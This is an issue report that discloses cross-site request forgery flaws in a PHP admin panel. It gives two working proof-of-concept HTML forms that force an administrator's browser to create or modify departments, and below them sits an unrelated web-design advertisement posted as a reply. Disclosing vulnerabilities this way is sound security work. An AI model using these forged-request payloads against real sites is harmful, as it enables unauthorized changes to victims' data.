several CSRF vulnerabilities that can perform CRUD operations
Opened this issue · 1 comments
13345674 commented
After the login as administrator,the poc below opened in another html can force a database CRUD operation.
such as new department creation:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/v1/index.php/Dept/dept_add/" method="POST">
<input type="hidden" name="name" value="1234" />
<input type="hidden" name="tel" value="1234" />
<input type="hidden" name="fax" value="1234" />
<input type="hidden" name="parentID" value="29" />
<input type="hidden" name="sort" value="2" />
<input type="hidden" name="visible" value="1" />
<input type="hidden" name="intro" value="1234" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
and department modify:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/v1/index.php/Dept/dept_modify/id/31" method="POST">
<input type="hidden" name="name" value="�“�‰Œ�ƒ¨" />
<input type="hidden" name="tel" value="123456" />
<input type="hidden" name="fax" value="123456" />
<input type="hidden" name="parentID" value="29" />
<input type="hidden" name="sort" value="1" />
<input type="hidden" name="visible" value="1" />
<input type="hidden" name="intro" value="123456" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
lingqifei commented
成都零起飞网站建设专为成都中小型企业、团体及个人提供网站制作、网站设计、网站二次开发、网络维护、网站域名空间、网站策划、FLASH动画设计、网站优化(SEO)
QQ号码:1871720801 网站:http://www.07fly.com